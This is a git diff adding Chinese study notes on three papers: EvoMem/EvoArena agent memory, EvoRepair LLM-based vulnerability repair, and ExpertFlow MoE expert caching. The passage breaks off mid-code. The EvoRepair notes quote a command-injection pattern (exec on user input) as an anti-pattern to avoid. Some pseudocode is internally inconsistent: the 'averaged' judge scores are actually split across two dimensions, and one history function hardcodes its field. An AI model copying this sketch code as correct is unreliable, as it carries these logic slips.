/var/www} + 之后: {部署路径: /srv/www} + 原因: 安全策略更新,部署目录统一迁移 + 证据: "部署路径应迁移至 /srv/www" + ++ 补丁 #2: + 之前: {需要权限: false} + 之后: {需要权限: true} + 原因: 新增权限校验要求 + 证据: "所有部署需经管理员审批" +``` + +每条补丁包含四个字段: + +1. **pre** — 更新前的状态 +2. **post** — 更新后的状态 +3. **rationale** — 为什么更新 +4. **evidence** — 触发的上下文证据 + +### 3.2 关键特性 + +- **只追加(Append-only)**:补丁一旦写入永不修改,保证可追溯 +- **版本感知检索**:默认检索最新状态;当查询涉及被覆盖的状态、冲突证据或旧版本时,主动检索相关补丁 +- **与 Agent 解耦**:EvoMem 可以集成到 Terminus2、OpenHands、Memento-Skill、A-Mem 等多种 Agent 框架中 + +### 3.3 代码示例:EvoMem 的数据结构 + +```python +class Patch: + """一条记忆补丁 — 类似 Git commit""" + def __init__(self, patch_id, field, pre_value, post_value, rationale, evidence): + self.patch_id = patch_id # 补丁编号 + self.field = field # 受影响的记忆字段 + self.pre_value = pre_value # 更新前的值 + self.post_value = post_value # 更新后的值 + self.rationale = rationale # 为什么更新 + self.evidence = evidence # 触发证据 + +class EvoMem: + """EvoMem 记忆系统 — 像 Git 一样追踪记忆演化""" + + def __init__(self): + self.patches = [] # 只追加的补丁历史 + self.state = {} # 当前最新状态(由补丁推导) + self.next_id = 1 + + def apply(self, field, post_value, rationale, evidence): + """应用一条记忆更新,生成补丁""" + pre_value = self.state.get(field) + if pre_value == post_value: + return # 值没变,不生成补丁 + + patch = Patch( + patch_id=self.next_id, + field=field, + pre_value=pre_value, + post_value=post_value, + rationale=rationale, + evidence=evidence, + ) + self.patches.append(patch) + self.state[field] = post_value + self.next_id += 1 + + def retrieve_patches_for(self, field): + """检索某个字段的所有演化补丁""" + return [p for p in self.patches if p.field == field] + + def get_history(self): + """获取某字段的完整演化历史""" + patches = self.retrieve_patches_for("deployment_path") + history = [] + for p in patches: + history.append({ + "patch_id": p.patch_id, + "from": p.pre_value, + "to": p.post_value, + "why": p.rationale, + }) + return history +``` + +### 3.4 代码示例:EvoMem 在 Agent 中的使用 + +```python +# === 第一轮:部署路径是 /var/www === +evomem = EvoMem() +evomem.apply( + field="deployment_path", + post_value="/var/www", + rationale="初始部署配置", + evidence="任务要求将文件部署到 /var/www", +) + +# 此时 agent 记忆状态: { "deployment_path": "/var/www" } + +# === 第二轮:安全策略更新,路径改为 /srv/www === +evomem.apply( + field="deployment_path", + post_value="/srv/www", + rationale="安全策略更新:部署目录统一迁移", + evidence="通知:所有部署路径应迁移至 /srv/www", +) + +# 此时 agent 记忆状态: { "deployment_path": "/srv/www" } + +# === Agent 执行任务时 === +# 传统 Agent 只看到最新的 /srv/www — 丢失了之前的上下文 +# EvoMem Agent 可以检索完整历史: +history = evomem.get_history() + +for entry in history: + print(f"补丁 #{entry['patch_id']}: {entry['from']} -> {entry['to']}") + print(f" 原因: {entry['why']}") + +# 输出: +# 补丁 #1: None -> /var/www +# 原因: 初始部署配置 +# 补丁 #2: /var/www -> /srv/www +# 原因: 安全策略更新:部署目录统一迁移 +``` + +### 3.5 检索策略 + +EvoMem 在推理时有两种检索模式: + +1. **默认模式**:从最新状态检索(和普通记忆系统一样快) +2. **增强模式**:当查询涉及被覆盖的状态、冲突证据、或需要理解演化脉络时,额外检索相关补丁 + +这保证了 EvoMem 的额外开销很小——只在需要时才查"旧版本"。 + +## 4 实验结果 + +### 4.1 EvoArena 上的表现 + +- 现有 Agent 平均准确率:**39.6%** +- EvoMem 带来平均 **+1.5%** 的提升 +- 在 Chain Accuracy(整个版本链全部答对)上提升 **+3.7%** + +Chain Accuracy 的提升特别值得注意——说明 EvoMem 帮助 Agent 在处理一连串相关的演化子任务时表现更好。 + +### 4.2 在传统基准上也有效 + +EvoMem 不仅在 EvoArena 上有效,在标准长程 Agent 基准上也有提升: + +- **GAIA**:+6.1% +- **LoCoMo**:+4.8% + +这表明 EvoMem 的记忆追溯能力对通用 Agent 任务都有帮助。 + +### 4.3 机制分析 + +论文做了机制分析,发现 EvoMem 有效的关键原因: + +- **PersonaMem-Evo**上,EvoMem 在"时间轨迹"和"多模式综合"问题上提升最大——这些任务需要记住分散在不同时间的偏好变化 +- **行级证据捕获**改善:补丁更好地保留了推理所需的完整状态信息 +- **Terminal-Bench-Evo**上,当检索到的过渡信息被实际用于执行时,EvoMem 效果最好 + +## 5 关键对比:EvoArena vs 现有基准 + +| 基准 | 什么在变 | 持久演化 | 隐性变化 | 链式评估 | +|---|---|---|---|---| +| SWE-bench | 静态问题 | ✗ | ✗ | ✗ | +| GAIA | 静态任务 | ✗ | ✗ | ✗ | +| GAIA2 | 异步事件 | △ | ✓ | ✗ | +| HorizonBench | 偏好变化 | △ | ✓ | ✗ | +| **EvoArena** | **动态环境** | **✓** | **✓** | **✓** | + +PE = Persistent Environment Evolution(持久环境演化) +IC = Implicit Change(隐性变化) +CE = Chain Evaluation(链式评估) + +EvoArena 是首个同时支持这三个特性的基准。 + +## 6 一句话总结 + +> 传统 Agent 记忆像一篇只保留当前版本的 Word 文档;EvoMem 把它变成了带完整版本历史的 Git 仓库。 + +## 7 学习思考 + +1. **Patch 的粒度**:论文没有明确定义"什么变化值得记为一条补丁"。如果每个微小的状态变化都记一条,补丁会不会膨胀?如何筛选有意义的变化? + +2. **与 RAG 的区别**:RAG 也是"检索额外信息",但 RAG 检索的是外部知识库,EvoMem 检索的是记忆自身的演化历史。两者可以互补。 + +3. **实际部署成本**:Append-only 意味着记忆数据随时间线性增长。长期运行的 Agent 是否需要定期"压缩"补丁历史? + +## 8 参考资料 + +- arXiv: [2606.13681](https://arxiv.org/abs/2606.13681) +- 项目页面: [https://aiden0526.github.io/EvoArena/](https://aiden0526.github.io/EvoArena/) +- 代码: [https://github.com/Aiden0526/EvoArena](https://github.com/Aiden0526/EvoArena) +- 数据集: [HuggingFace Collection](https://huggingface.co/collections/Aiden0526/evoarena) +- 作者: Jundong Xu, Qingchuan Li, Zhiyuan Hu 等(新加坡国立大学等) diff --git a/src/content/docs/papers/evorepair-vulnerability-repair-via-self-evolution-arxiv-2605-30105.md b/src/content/docs/papers/evorepair-vulnerability-repair-via-self-evolution-arxiv-2605-30105.md new file mode 100644 index 000000000..ec3b59f69 --- /dev/null +++ b/src/content/docs/papers/evorepair-vulnerability-repair-via-self-evolution-arxiv-2605-30105.md @@ -0,0 +1,390 @@ +--- +title: EvoRepair — Vulnerability Repair via Self-Evolution +来源: https://arxiv.org/abs/2605.30105 +日期: 2026-06-13 +分类: 安全与隐私 +子分类: 安全与隐私 +provenance: pipeline-v3 +--- + +# EvoRepair:基于自我进化的漏洞修复 + +## 一、从日常类比说起 + +想象你是一位修车师傅。 + +- **没有经验积累的 AI**:每来一辆故障车,它都从头猜——换这个零件、试一下、不行、再换那个零件、还是不行……对每一辆车都是全新的" trial and error"。 +- **EvoRepair 的思路**:它像一个"会做笔记的老师傅"。每次修好一辆车,它会把**故障现象、排查思路、成功/失败的尝试、最终方案**写成一份结构化笔记存进"经验手册"。下一辆车来时,它先翻手册:「以前修过类似的,看看怎么处理的」——这就叫**经验检索**。修完之后再把新经验整理进手册——这就叫**经验构建**。手册越翻越厚,师傅越来越厉害——这就叫**自我进化**。 + +这个类比的核心映射关系: + +| 日常世界 | 计算机系统 | +|---|---| +| 修车师傅 | LLM Agent(大语言模型代理) | +| 故障车 | 安全漏洞(CVE) | +| 经验手册 | 经验库(Experience Bank) | +| 翻手册 | 经验检索(Experience Retrieval) | +| 写新笔记 | 经验构建(Experience Construction) | +| 师傅越来越强 | 自我进化(Self-Evolution) | + +## 二、为什么需要 EvoRepair + +2024 年全球报告了 **38,942** 个新 CVE(安全漏洞),同比增长 25%。漏洞越来越多,靠人工修复已经不够了。 + +过去用 AI 修漏洞,有两个致命缺陷: + +**缺陷 1:同一个漏洞修不好,也不记住** + +一个漏洞可能需要 5-10 轮尝试才能修对。但传统 AI 每轮都是"重来"——上一轮踩过的坑,下一轮继续踩。 + +**缺陷 2:修完一个漏洞,经验就丢了** + +修好 CVE-A 的经验,不能帮助修 CVE-B。即使两个漏洞类型相同(比如都是缓冲区溢出),AI 也会当成全新问题来处理。 + +EvoRepair 要解决的就是这两个问题:**同一个漏洞内的经验积累**(intra-vulnerability)和**跨漏洞的经验复用**(cross-vulnerability)。 + +## 三、核心概念:什么是"经验" + +EvoRepair 对"经验"有精确定义——不是原始的操作日志,而是**从修复过程中提炼出的结构化知识**。 + +每条经验由 5 个维度构成: + +1. **漏洞介绍与分析**:漏洞类型、位置、复现步骤、根本原因 +2. **修复策略**:为什么选这个方案、预期效果、备选方案 +3. **路径分析**:哪些尝试成功了、哪些失败了、为什么 +4. **经验总结**:提炼成可复用的规则(适用条件 + 具体建议 + 代码示例) +5. **反思与改进**:修复的不足之处、后续改进建议 + +## 四、EvoRepair 的五个组件 + +### 4.1 经验检索(Experience Retrieval) + +每次开始修一个新漏洞前,EvoRepair 先做两件事: + +1. **查自己**:这个漏洞以前修过吗?有就直接用 +2. **查别人**:从经验库中找相似的漏洞(通过 CVE/CWE 编号匹配),取前 K 条最相关的经验 + +检索的排序公式: + +``` +综合得分 = μ × 相似度 + (1-μ) × 经验质量分 +``` + +意思是:既要看"这个经验和问题有多像",也要看"这个经验本身质量高不高"。 + +### 4.2 漏洞修复(Vulnerability Repair) + +EvoRepair 用一个极简的"基础 Agent"来实际修漏洞。它只有: + +- **一个 Bash 工具箱**:能跑命令、能提交补丁 +- **一组技能**:理解漏洞、复现 PoC、定位漏洞、验证补丁 +- **一段记忆**:把检索到的历史经验加载进来 +- **一个上下文**:包括 CVE 描述、CWE 类型、修复指引 + +Agent 按照 ReAct 范式在 Docker 环境中自主修复,直到修好或超出预算(最多 100 步或 $3)。 + +### 4.3 经验构建(Experience Construction) + +修复完成后,EvoRepair 做三件事: + +1. **提炼经验**:把整个修复过程写成结构化笔记 +2. **压缩经验**:控制长度,避免上下文窗口爆炸 +3. **打分评估**:用 LLM 当裁判,从两个维度打分: + +``` +经验质量分 = λ × 实用性评分 + (1-λ) × 泛化性评分 +``` + +- **实用性**:这条经验能不能帮别人修类似的漏洞 +- **泛化性**:这条经验能不能跨语言、跨数据集复用 + +λ 设为 0.5,两个维度各占一半权重。 + +### 4.4 经验更新(Experience Updating) + +经验库不是只进不出的。对同一个漏洞的多次修复尝试,EvoRepair 有三种策略: + +- **丢弃**:新经验分数低 → 保留旧的 +- **保留**:新经验分数高 → 替换旧的 +- **打磨**:分数一样 → 让 LLM 把两条融合成一条更好的 + +### 4.5 经验迁移(Experience Transfer) + +这是 EvoRepair 最酷的能力之一。在 Python 项目上学到的经验,可以直接迁移到 Java、Go 项目上。论文在 VUL4J(Java 漏洞集)上做了交叉验证实验,证明经验确实可以跨语言复用。 + +## 五、代码示例 + +### 示例 1:经验检索的伪代码 + +```python +# 假设当前要修复 CVE-2020-8132 +# 第一步:从经验库检索相似经验 + +def retrieve_experiences(target_cve, target_cwe, experience_bank, K=3): + """ + 检索经验:给当前漏洞找最相关的历史经验 + """ + # 1. 先查这个漏洞自己有没有历史经验 + self_experiences = experience_bank.query_by_cve(target_cve) + + # 2. 再查其他相似漏洞的经验 + # 用 CWE 分类 + 语义相似度来匹配 + all_candidates = experience_bank.query_by_cwe_similarity( + cwe=target_cwe, + top_m=10 # 先粗筛前 10 条 + ) + + # 3. 综合排序:相似度 + 经验质量 + ranked = [] + for exp in all_candidates: + sim = compute_similarity(target_cve, exp['cve'], exp['text']) + score = exp['quality_score'] # 之前打分的结果 + combined = 0.6 * sim + 0.4 * score # μ=0.6 + ranked.append((exp, combined)) + + # 4. 取前 K 条 + ranked.sort(key=lambda x: x[1], reverse=True) + return [exp for exp, _ in ranked[:K]] + +# 实际使用 +experiences = retrieve_experiences( + target_cve="CVE-2020-8132", + target_cwe="CWE-78", # 命令注入 + experience_bank=experience_bank +) + +# 把检索到的经验注入到 Agent 的上下文中 +for exp in experiences: + print(f"参考经验: {exp['title']}") + print(f" 修复策略: {exp['strategy']}") + print(f" 关键建议: {exp['summary']}") + print() +``` + +### 示例 2:经验构建的伪代码 + +```python +# 假设 Agent 已经修复了一个漏洞,现在要提炼经验 + +def construct_experience( + vulnerability_id: str, + repair_trajectory: list, + success: bool, + judge_model: str = "Qwen3-Max" +) -> dict: + """ + 从修复轨迹中提炼结构化经验 + """ + # 修复轨迹示例: + # [ + # {"action": "run_poc", "result": "vulnerable"}, + # {"action": "locate_code", "file": "server.js", "line": 42}, + # {"action": "edit_code", "change": "replace exec() with execFile()"}, + # {"action": "run_poc", "result": "fixed"}, + # {"action": "submit_patch"} + # ] + + prompt = f""" +请根据以下修复轨迹,提炼一条结构化经验: + +漏洞ID: {vulnerability_id} +修复结果: {'成功' if success else '失败'} +修复轨迹: {repair_trajectory} + +请按以下格式输出: + +## 漏洞介绍 +- 漏洞类型: +- 根本原因: +- 影响范围: + +## 修复策略 +- 采用的方法: +- 为什么选这个方法: + +## 经验总结(可复用规则) +- 适用条件: +- 具体建议: +- 代码示例: + +## 反思 +- 不足之处: +- 改进建议: +""" + + # 用 LLM 生成结构化经验 + experience = judge_model.generate(prompt) + + # 给经验打分 + score_prompt = f""" +请给这条经验打分(1-10): + +经验内容: {experience} + +维度1 - 实用性:这条经验能不能帮别人修类似的漏洞? +维度2 - 泛化性:这条经验能不能跨语言/跨项目复用? +""" + + # 三次评分取平均,减少偏差 + scores = [judge_model.score(score_prompt) for _ in range(3)] + quality_score = scores[0] + general_score = scores[1] + final_score = 0.5 * quality_score + 0.5 * general_score + + return { + "vulnerability_id": vulnerability_id, + "content": experience, + "quality_score": quality_score, + "general_score": general_score, + "final_score": final_score, + "success": success + } + +# 实际使用 +new_experience = construct_experience( + vulnerability_id="CVE-2020-8132", + repair_trajectory=agent_trajectory, + success=True +) + +# 存入经验库 +experience_bank.add(new_experience) + +# 经验库中存的是什么样子(Markdown 格式): +# --- +# vulnerability_id: CVE-2020-8132 +# cwe: CWE-78 +# quality_score: 8.5 +# general_score: 7.0 +# --- +# +# ## 漏洞介绍 +# - 漏洞类型: 命令注入 (Command Injection) +# - 根本原因: 使用 child_process.exec() 直接执行用户输入 +# +# ## 修复策略 +# - 采用的方法: 将 exec() 替换为 execFile() +# - 为什么: execFile() 不会调用 shell,避免命令注入 +# +# ## 经验总结 +# - 适用条件: Node.js 项目中需要执行外部命令 +# - 具体建议: 永远不要用 exec() 处理用户输入,改用 execFile() +# - 代码示例: 避免 child_process.exec(`cmd ${userInput}`) +# 改为: child_process.execFile('cmd', [userInput]) +``` + +### 示例 3:经验更新的三种策略 + +```python +def update_experience( + experience_bank: dict, + vulnerability_id: str, + new_experience: dict +) -> str: + """ + 经验更新策略:丢弃 / 保留 / 打磨 + """ + old_experience = experience_bank.get(vulnerability_id) + + if old_experience is None: + # 首次存入 + experience_bank[vulnerability_id] = new_experience + return "stored" + + old_score = old_experience['final_score'] + new_score = new_experience['final_score'] + + if new_score < old_score: + # 策略1: 丢弃 - 新经验不如旧的 + return "discarded" + elif new_score > old_score: + # 策略2: 保留 - 新经验更好,替换 + experience_bank[vulnerability_id] = new_experience + return "replaced" + else: + # 策略3: 打磨 - 分数相同,让 LLM 融合两条 + prompt = f""" +以下两条经验分数相同,请融合成一条更好的: + +经验A: {old_experience['content']} +经验B: {new_experience['content']} + +请保留两者的优点,产出一条统一的新经验。 +""" + polished = judge_model.generate(prompt) + experience_bank[vulnerability_id] = { + **new_experience, + 'content': polished, + 'polished': True + } + return "polished" +``` + +## 六、实验结果(通俗解读) + +### 6.1 在两大数据集上全面领先 + +EvoRepair 在两个主流漏洞修复数据集上测试: + +| 数据集 | 语言 | 漏洞数 | EvoRepair 修复率 | +|---|---|---|---| +| PATCHEVAL | JS/Python/Go | 230 | **93.47%** | +| SEC-bench | C | 200 | **87.00%** | +| 合计 | 多语言 | 430 | **90.46%** | + +对比最强的基线方法(Live-SWE-Agent)高出近 7 个百分点。 + +### 6.2 比 LoopRepair 强多少? + +LoopRepair 是之前的最强 LLM 基线,EvoRepair 比它: + +- PATCHEVAL 上高出 **39.56%** +- SEC-bench 上高出 **33.50%** + +这个差距非常大。原因很简单:LoopRepair 只是在单次修复中多转几圈(循环尝试),但每次都是"新的"。EvoRepair 是"越修越聪明"——每一轮都在积累知识。 + +### 6.3 多轮修复的效果 + +EvoRepair 最多可以修 15 轮。随着轮次增加,修复率持续上升,但在第 4-5 轮后增速明显放缓——这说明大部分漏洞在早期就修好了,后期的边际收益递减。 + +## 七、关键创新点总结 + +1. **首次提出"经验驱动的自我进化"**:AVR 领域第一个明确让系统"学会学习"的方法 +2. **经验有标准格式**:5 个维度让经验可存储、可检索、可比较、可迁移 +3. **质量感知评分**:不是所有经验都值得存——用 LLM 打分筛选高质量经验 +4. **经验迁移**:学到的经验可以跨语言、跨数据集、跨模型复用 +5. **框架无关**:可以套在任何主流 Agent 框架上(SWE-agent、OpenHands 等) + +## 八、反思与思考 + +这个研究最打动我的一点是:它把 AI 从"一次性答题机器"变成了"持续学习的系统"。 + +但也要看到局限: + +- 经验库需要额外的存储和检索开销 +- 冷启动问题:第一条经验从哪里来?论文用了两个热身策略(官方补丁 / 预生成经验) +- LLM-as-a-Judge 的评分可能存在偏见 +- 经验之间可能产生冲突,论文暂未深入讨论 + +## 九、关键术语速查 + +| 术语 | 英文 | 解释 | +|---|---|---| +| CVE | Common Vulnerabilities and Exposures | 漏洞的唯一编号 | +| CWE | Common Weakness Enumeration | 漏洞类型的分类标准 | +| AVR | Automated Vulnerability Repair | 自动化漏洞修复 | +| PoC | Proof of Concept | 证明漏洞存在的代码 | +| ReAct | Reasoning + Acting | Agent 的经典范式:先推理再行动 | +| Experience Bank | 经验库 | EvoRepair 的核心组件,存储结构化经验 | +| Turn-level yield rate | 轮次收益率 | α = β/γ,衡量每轮修复的性价比 | + +## 十、延伸思考 + +如果让你来改进 EvoRepair,你会从哪个方向入手? + +- 经验的自动去重和冲突检测? +- 不用 LLM 打分,用更客观的指标? +- 把经验压缩成更小的模型来推理? +- 支持多人协作的经验共享? + +这些都是值得继续探索的问题。 diff --git a/src/content/docs/papers/expertflow-moe-offload.md b/src/content/docs/papers/expertflow-moe-offload.md new file mode 100644 index 000000000..054007c86 --- /dev/null +++ b/src/content/docs/papers/expertflow-moe-offload.md @@ -0,0 +1,408 @@ +--- +title: ExpertFlow — MoE 预测式专家缓存与 Token 调度(零基础学习笔记) +来源: https://arxiv.org/abs/2410.17954 +日期: 2026-06-13 +子分类: ML 系统 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:专科会诊 vs 临时借书 + +想象你要在一间**只有四张手术台**的小诊所(单卡 GPU,显存有限)里,运行一座**拥有 128 个专科科室**的超大型联合医院(MoE 大模型)。 + +MoE 的聪明之处在于:每个病人(token)每次只去 **Top-K 个科室**会诊——算力上很省。但问题是:**全部科室的设备和档案都要存在某处**。128 个专家 × 32 层,总参数量轻松超过单卡显存(Mixtral-8×7B 约 96 GB,A100 只有 80 GB)。 + +常见做法是 **Offloading(卸载)**:把暂时不用的专家放在 CPU 内存里,需要时再搬到 GPU——像把大部头书放在仓库,用时临时借到阅览室。 + +但这样会遇到三个现实麻烦: + +1. **不知道下一页要借哪本书**:路由(router)决定每个 token 去哪个专家,只有算到那一层才知道——若等算完再搬,GPU 在等 I/O。 +2. **病人排班太散**:两个 batch 各 4 个 token,每人去不同科室,结果**四个科室各只来 1 个病人**——专家 kernel 启动成本固定,利用率极低。 +3. **阅览室书架按「最近用过」腾位(LRU)**:MoE 路由是**输入相关、动态变化**的,LRU 经常猜错,专家在 CPU/GPU 之间来回折腾。 + +**ExpertFlow**(He 等,**DAC 2026**,arXiv:[2410.17954](https://arxiv.org/abs/2410.17954))的做法像给诊所配了三个协同岗位: + +- **Routing Path Predictor (RPP)**:值班秘书提前看完整病历,**一次预测**所有层会激活哪些科室; +- **Token Scheduler (TS)**:把「会去同一组科室」的病人**合并排班**,让每个 batch 少开科室、每个科室多来人; +- **Expert Cache Engine (ECE)**:按预测**预取**专家到 GPU,算错了再**轻量纠错**。 + +论文在单卡 A40 上报告:GPU 峰值显存最高降 **93.72%**,相对强 offloading 基线吞吐最高 **10×**;缓存命中率 **91.96%**,比 LRU 高最多 **61.15%**。 + +一句话:**MoE 单卡推理的关键不是「能不能 offload」,而是「能不能提前知道要 load 谁、怎么排 token、怎么管缓存」。** + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 全称 | ExpertFlow: Efficient Mixture-of-Experts Inference via Predictive Expert Caching and Token Scheduling | +| 会议 | DAC 2026(ACM/IEEE 设计自动化会议) | +| 机构 | A*STAR、港科大、哈工大(深圳)、南洋理工等 | +| 问题域 | **单 GPU / 显存受限**场景下的 MoE **推理** offloading | +| 对比基线 | Cache-MoE(LRU)、SE-MoE(环缓冲)、Pregated-MoE 等 | +| 验证模型 | Switch-32/64/128、Mixtral-8×7B、Qwen1.5-MoE、DeepSeek-MoE | +| 与压缩正交 | 可与量化、剪枝、蒸馏叠加,进一步省显存 | + +ExpertFlow 是**系统层**工作,不改 MoE 模型权重或路由算法本身,而是在 CPU–GPU 异构内存之上做**预测 + 调度 + 缓存**的协同设计。 + +--- + +## 为什么重要 + +### 1. MoE 的「参数墙」与「算力墙」分离 + +Dense 模型:参数量 ≈ 每 token 计算量。MoE:**总参数巨大**,但每 token 只激活一小部分——显存要装下**全部专家**,计算却只跑**少数专家**。单卡部署 Mixtral、Qwen-MoE、DeepSeek-MoE 时,瓶颈往往是**显存装不下**,不是 FLOPs 不够。 + +### 2. 动态路由让传统缓存失效 + +LRU / LFU 按「最近/最常使用」驱逐,**不看输入内容**。MoE 的 expert 激活是 **token × layer 相关**的——同一模型在不同任务上路由模式差异很大。固定「每层分 N 个缓存槽」的策略(如 Cache-MoE)在 batch 变大、专家变多时命中率骤降。 + +### 3. 预测必须「全局、提前、便宜」 + +已有方案的两难: + +| 路线 | 代表 | 问题 | +|------|------|------| +| 回归 router 分数 | Pregated-MoE | 分数误差影响输出质量,需大量微调 | +| 逐层 MLP 预测 | ProMoE | 必须等上一层算完才知道下一层,无法提前 prefetch | +| 启发式统计 | token–expert 频率 | 轻量但捕捉不了输入相关路由 | + +ExpertFlow 的 RPP 用 **T5 式 encoder–decoder**,**一次前向**输出形状 `(B, S, L, E)` 的全局路由概率,模型仅 **7.21 MB**,batch 级准确率可达 **95%** 量级。 + +### 4. 与 PagedAttention / vLLM 的互补关系 + +- **vLLM / PagedAttention**:解决 **KV cache** 的显存碎片与共享(attention 侧)。 +- **ExpertFlow**:解决 **专家权重** 在 CPU/GPU 之间的动态搬运(MoE FFN 侧)。 + +大 MoE serving 要同时管 KV 和 expert——二者正交,可叠加。 + +--- + +## 核心概念 + +### 1. MoE 路由回顾 + +对输入 token 向量 \(x\),router 计算 \(G(x) = \text{softmax}(x W_g)\),选 Top-K 专家,输出为选中专家的加权和: + +\[ +y = \sum_{i \in \text{TopK}(G(x))} G_i(x)\, E_i(x) +\] + +每个 token 的路由路径可编码为二元矩阵 \(r \in \{0,1\}^{L \times E}\):第 \(l\) 层第 \(e\) 个专家若被激活则为 1。 + +### 2. Routing Path Predictor (RPP) + +**架构**:T5 风格 encoder 嵌入整段输入,decoder 挂 **L 个轻量 head**,每层输出 E 维 logits → sigmoid 得概率矩阵 \(p\)。 + +**训练**:从 MoE 推理日志收集 token 的真实路由 \(r\),多标签二分类,损失为逐层逐专家的 **BCE**: + +\[ +\mathcal{L} = \frac{1}{LE}\sum_{l=1}^{L}\sum_{e=1}^{E}\left[r_{l,e}\log p_{l,e} + (1-r_{l,e})\log(1-p_{l,e})\right] +\] + +**关键性质**:在**第一个 MoE 层执行之前**就得到全层路由计划 → 支持 ECE 预取与 TS 重排。 + +**数据**:每个 (任务, 模型) 组合采样 1 万序列 × 3 次解码,得约 3 万条 (输入, 输出, 路由路径) 三元组。 + +### 3. Token Scheduler (TS) + +**动机(最坏情况)**:2 个 batch、每层 4 专家、每 batch 4 token,若每人去不同专家 → **每层 4 个专家各只处理 1 token**,kernel 效率极低且缓存频繁换入换出。 + +**目标**:合并相邻两个 batch 的 \(2T\) 个 token,分成两个等规模新 batch \(\mathcal{T}_1, \mathcal{T}_2\),最小化两 batch 激活专家总数: + +\[ +\min_{\mathcal{T}_1,\mathcal{T}_2}\;\sum_{l=1}^{L}\sum_{e=1}^{E}\big(R_1^{l,e}+R_2^{l,e}\big),\quad R_k = \bigvee_{i\in\mathcal{T}_k} r_i +\] + +**近似算法**:对路由路径算 Hamming 相似度矩阵,用 **K-means 风格**聚成 2 簇,CPU 开销 < 10 ms。 + +**KV 一致性**:重排 token 会破坏原 KV cache 顺序 → TS 提供 **Merge**(按全局顺序重建 KV)和 **Reindex**(更新 token 索引)。 + +**Dual-Batch Pipeline**:每 2 个 batch 为一调度单元;当前单元做 prefill/decode 的同时,**并行**对下一单元跑 RPP + TS,隐藏预测开销。 + +### 4. Expert Cache Engine (ECE) + +由两部分组成: + +#### PLEC(Predictive Locality-aware Expert Caching) + +与 LRU「每层固定槽位、按时间驱逐」不同,PLEC **跨层动态分配**缓存槽,并按 RPP 预测 **prefetch** 下一阶段需要的专家。 + +**例子**(论文 Fig. 5):2 层 × 每层 4 专家,GPU 只能缓存 4 个专家;预测需 5 个 → 按预测需求给 layer-1 分 3 槽、layer-2 分 1 槽,先加载 \(e_{12}, e_{13}, e_{14}, e_{22}\);layer-1 算完后释放槽位,异步加载 \(e_{23}\)。 + +#### Real-time Correction + +预测错误时(多加载了不需要的专家、漏了需要的专家),在**当前专家计算进行时**做**优先级交换**,I/O 与计算 overlap,避免流水线 stall。 + +### 5. 系统流水线总览 + +```text +输入 batches + → [RPP] 一次预测 (B,S,L,E) 路由概率 + → [TS] 跨 batch 重排 token,合并相似路由 + → [ECE] PLEC 预取 + 运行时纠错 + → [MoE] 仅加载所需专家,在 GPU 上执行 + (Dual-Batch:与下一批的 RPP/TS 并行) +``` + +--- + +## 代码示例 1:理解 MoE 路由与路由路径矩阵 + +下面用 PyTorch 风格伪代码说明「一个 token 的路由路径」如何编码——这是 RPP 训练标签和 TS 聚类的共同基础。 + +```python +import torch +import torch.nn.functional as F + +def moe_route_and_encode_path(x, router, num_experts: int, top_k: int): + """ + x: (hidden,) 单个 token 的隐藏状态 + router: Linear(hidden, num_experts) + 返回: top_k 专家索引, 路由权重, 路径矩阵 r ∈ {0,1}^{L×E} 的单层切片 + """ + logits = router(x) # (E,) + probs = F.softmax(logits, dim=-1) + weights, indices = torch.topk(probs, top_k) + + r_layer = torch.zeros(num_experts, dtype=torch.bool) + r_layer[indices] = True # 被激活的专家置 1 + return indices, weights, r_layer + + +def batch_routing_matrix(token_paths: list[torch.Tensor]) -> torch.Tensor: + """ + token_paths: 长度为 T 的列表,每个元素 shape (L, E) + 批级路由 = 所有 token 路径的逻辑 OR(与论文 R_batch 定义一致) + """ + stacked = torch.stack(token_paths, dim=0) # (T, L, E) + return stacked.any(dim=0) # (L, E) + + +# 示例:4 层 MoE,每层 8 专家,2 个 token +L, E, top_k = 4, 8, 2 +paths = [] +for _ in range(2): + layer_paths = [] + for _ in range(L): + fake_router = torch.randn(E) + _, _, r = moe_route_and_encode_path( + torch.randn(512), + lambda x: fake_router, # 简化:直接用随机 logits + E, + top_k, + ) + layer_paths.append(r) + paths.append(torch.stack(layer_paths)) # (L, E) + +R_batch = batch_routing_matrix(paths) +print("本 batch 激活专家数:", R_batch.sum().item()) +``` + +TS 的目标就是:把多个 batch 的 token **重新分组**,使分组后的 `R_batch` 之和更小——更少专家被同时激活。 + +--- + +## 代码示例 2:RPP 训练损失与 TS 的 Hamming 聚类骨架 + +```python +import torch +import torch.nn as nn + +class RoutingPathPredictorLoss(nn.Module): + """论文 Eq.(1):全层全专家 BCE,与 ExpertFlow RPP 训练目标一致""" + + def forward(self, p: torch.Tensor, r: torch.Tensor) -> torch.Tensor: + # p, r: (B, S, L, E),概率 vs 0/1 标签 + eps = 1e-8 + bce = -(r * torch.log(p + eps) + (1 - r) * torch.log(1 - p + eps)) + return bce.mean() # 等价于对 L,E 求平均 + + +def hamming_distance(path_a: torch.Tensor, path_b: torch.Tensor) -> int: + """两个 token 路由路径的 Hamming 距离(展平 L×E 后比较)""" + return (path_a != path_b).sum().item() + + +def schedule_two_batches(token_paths: list[torch.Tensor], max_iter: int = 20): + """ + 简化版 TS:2T 个 token 分成两个等大小 batch,最小化激活专家数。 + token_paths[i]: (L, E) bool + 论文用 K-means 风格迭代;此处用贪心 swap 示意。 + """ + T2 = len(token_paths) + assert T2 % 2 == 0 + half = T2 // 2 + # 初始:前 half / 后 half + assign = [0] * half + [1] * half + + def objective(assignment): + groups = [[], []] + for idx, g in enumerate(assignment): + groups[g].append(token_paths[idx]) + total = 0 + for g in groups: + if not g: + continue + R = torch.stack(g).any(dim=0) + total += R.sum().item() + return total + + best = assign[:] + best_obj = objective(best) + for _ in range(max_iter): + improved = False + for i in range(T2): + for j in range(i + 1, T2): + if assign[i] == assign[j]: + continue + trial = best[:] + trial[i], trial[j] = trial[j], trial[i] + obj = objective(trial) + if obj < best_obj: + best_obj, best = obj, trial + improved = True + if not improved: + break + return best, best_obj + + +# 演示 +L, E = 12, 32 +paths = [torch.rand(L, E) > 0.9 for _ in range(8)] # 稀疏随机路径 +assign, obj = schedule_two_batches(paths) +print("重排后两 batch 总激活专家数:", obj) +``` + +真实系统中 TS 用相似度矩阵 + K-means 近似,保证 **< 10 ms**;并与 **Merge/Reindex** 维护 KV cache 语义正确。 + +--- + +## 代码示例 3:PLEC 缓存槽分配(概念示意) + +```python +from dataclasses import dataclass + +@dataclass +class ExpertSlot: + layer: int + expert_id: int + + +def 